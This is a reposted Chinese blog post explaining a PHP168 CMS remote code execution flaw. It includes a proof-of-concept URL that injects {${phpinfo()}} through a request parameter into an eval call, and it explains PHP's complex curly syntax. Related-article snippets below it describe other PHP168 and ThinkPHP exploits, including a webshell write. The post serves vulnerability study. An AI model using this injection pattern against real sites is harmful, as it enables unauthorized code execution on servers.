php 168任意代码执行漏洞之php的Complex (curly) syntax

最新推荐文章于 2021-03-29 08:11:43 发布
最新推荐文章于 2021-03-29 08:11:43 发布
阅读量413 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/danku/p/10778306.html
版权

今天了解了php 168的任意代码执行漏洞,Poc:

http://192.168.6.128/pentest/cms/php168/member/post.php
?only=1
&showHtml_Type[bencandy][1]={${phpinfo()}}
&aid=1
&job=endHTML

通过代码审计得知,最后会执行

eval("\$array[showurl]=\"$filename_b\";");

而$filename_b最终值为**{${phpinfo()}}**

关于{${}}这种形式涉及到了php Complex (curly) syntax,

通过上图得知,

eval("\$array[showurl]=\"$filename_b\";");

实际上就是执行了phpinfo();

不理解的童鞋,可以去

https://www.php.net/manual/zh/language.types.string.php自行查阅,

另外,除了字符串之外,{${}}还有别的用法,可以创建一个新的变量,

https://stackoverflow.com/questions/14238120/purpose-of-complex-curly-syntax-outside-a-string-representation

欢迎评论区指导与批评。

转载于:https://www.cnblogs.com/danku/p/10778306.html

weixin_30415113
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP错误解决:Array and string offset access syntax with curly braces is deprecated
06-03 1811
查了下原因,是因为使用花括号大括号访问数组和字符串中的偏移量已经过时了。在PHP 7.4及以上版本中,这种方式将被视为警告,在未来版本中可能被移除。替代方法是使用方括号[]来访问偏移量。
php168 6.02漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞
weixin_30695935的博客
03-11 844
PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.漏洞出在inc/function.inc.php里面.get_html_url()这个函数.function get_html_url(){global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;$id=$aid;if($pa...
Php168代码执行漏洞,Vulnhub-ThinkPHP 2.x 任意代码执行漏洞
weixin_39637711的博客
03-27 199
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双...
php168v4.0漏洞,Php168 v 4.0 sp global.php 写入漏洞
weixin_31361715的博客
03-10 114
在global.php中有这样的代码:function login_logs($username,$password){global $timestamp,$onlineip;$logdb[]=\"$username\\t$password\\t$timestamp\\t$onlineip\";@include(PHP168_PATH.\"cache/adminlogin_logs.php\");...
PHPComplex:PHP类,用于处理复数
03-31
PHP复杂 PHP类,用于处理复数 掌握: 发展: 该库当前提供以下操作: 添加 减法 乘法 分配 除以 分成 连同功能 theta(极角θ角) rho(极距/半径) 共轭 消极的 逆(1 /复数) cos(余弦) ACOS(反余弦) cosh(双曲余弦) acosh(反双曲余弦) 罪(正弦) 反正弦 sinh(双曲正弦) asinh(反双曲正弦) 秒(割线) asec(反正割) sech(双曲正割) asech(反双曲正割) csc(正割) acsc(反余割) csch(双曲正割) acsch(反双曲正割) 棕褐色(切线) atan(反正切) tanh(双曲正切) atanh(反双曲正切) 婴儿床(余切) 算子(反余切) coth(双曲余切) 阿科斯(反双曲余切) sqrt(平方根) exp(指数) ln(自然对数) lo
php168v4.0漏洞,PHP168 V4.0 cookie欺骗 EXP
weixin_35958479的博客
03-10 281
漏洞的原理:具体的请看admin/global.php这个文件里面关于用户登陆部分的代码,这里截取一下。。。/*用户登录*/if($_POST[loginname]&&$_POST[loginpwd]){if($webdb[yzImgAdminLogin]){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzi...
Php fatal error:array and string offset access syntax with curly braces is no longer supported
最新发布
02-28
这个错误是由于使用了花括号(curly braces)来访问数组或字符串的偏移量,而这种语法在较新的PHP版本中已经不再支持。在较新的PHP版本中,只能使用方括号(square brackets)来访问数组或字符串的偏移量。 例如,...
基于PHP编程注意事项的小结
10-27
PHP编程中,需要注意一些关键点以确保代码的正确性和高效性。以下是对这些要点的详细解释: 1. **隐性的三元操作符优先级问题**: PHP中的三元操作符`?:`有时可能会引发混淆,特别是在与其他运算符结合使用时。...
汇总PHP编程注意事项.doc
01-12
这意味着即使你的模块内部习惯使用大写字母,如果在代码中混用了大小写,程序依然可以正常执行。然而,这并不意味着你应该在编写代码时忽略这个规则,因为良好的命名规范可以提高代码可读性。 3. **序列化与反序列...
php中序列化与反序列化详解
01-20
$stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);echo ; print_r(unserialize($new)); 结果:a:3:{i:0;s:3:”Moe”;i:1;s:5:”Larry”;i:2;s:5:”Curly”;} Array ( [0] =...
CurlySyntaxDefinition
07-03
卷曲语法定义 的语法定义。 最后,我将添加片段和其他内容。
php168sql注入漏洞
08-15
php168某版本存在sql注入,可通过该漏洞获取数据库信息
PHP168 0Day 文件代码泄露漏洞利用工具
03-24
PHP168 0Day 文件代码泄露漏洞利用工具
php168下载任意文件漏洞利用工具
05-22
php168下载任意文件 内部用的。。现在共享上来 拿积分的,点击查看代码后 等上三秒钟 如果有漏洞就可以看到对方的源代码了。。。
答疑存在sql注入的php168cms
08-15
cms问题答疑处存在sql注入,可sqlmap跑数据库。。。
php168系统漏洞,php168某系统注入漏洞
weixin_28885435的博客
03-29 350
漏洞概要缺陷编号:WooYun-2012-013476漏洞标题:php168某系统注入漏洞相关厂商:PHP168漏洞作者:书生提交时间:2012-10-17 22:33公开时间:2012-10-17 22:33漏洞类型:SQL注射漏洞危害等级:高自评Rank:20漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-10-17: 积极联系厂商并且等待厂商认领中,细节不对外...
PHP168 6.0及以下版本漏洞
weixin_30275415的博客
09-18 148
最近在研究PHP那个劲啊,就甭提鸟———————————本文引自黑客动画吧 危险等级:高 影响版本:PHP168 6.0以下版本 入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 出问题的文件login.php login.php?makehtml=1&chdb[htmlname]=...
php168 shell,php168 v6.0拿shell漏洞
weixin_42522676的博客
03-09 177
两步第一do/下jsarticle.php文件if(!eregi("^(hot|com|new|lastview|like|pic)$",$type)){die("类型有误");}$FileName=dirname(__FILE__)."/../cache/jsarticle_cache/";if($type==’like’){$FileName.=floor($id/3000)."/";}e...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值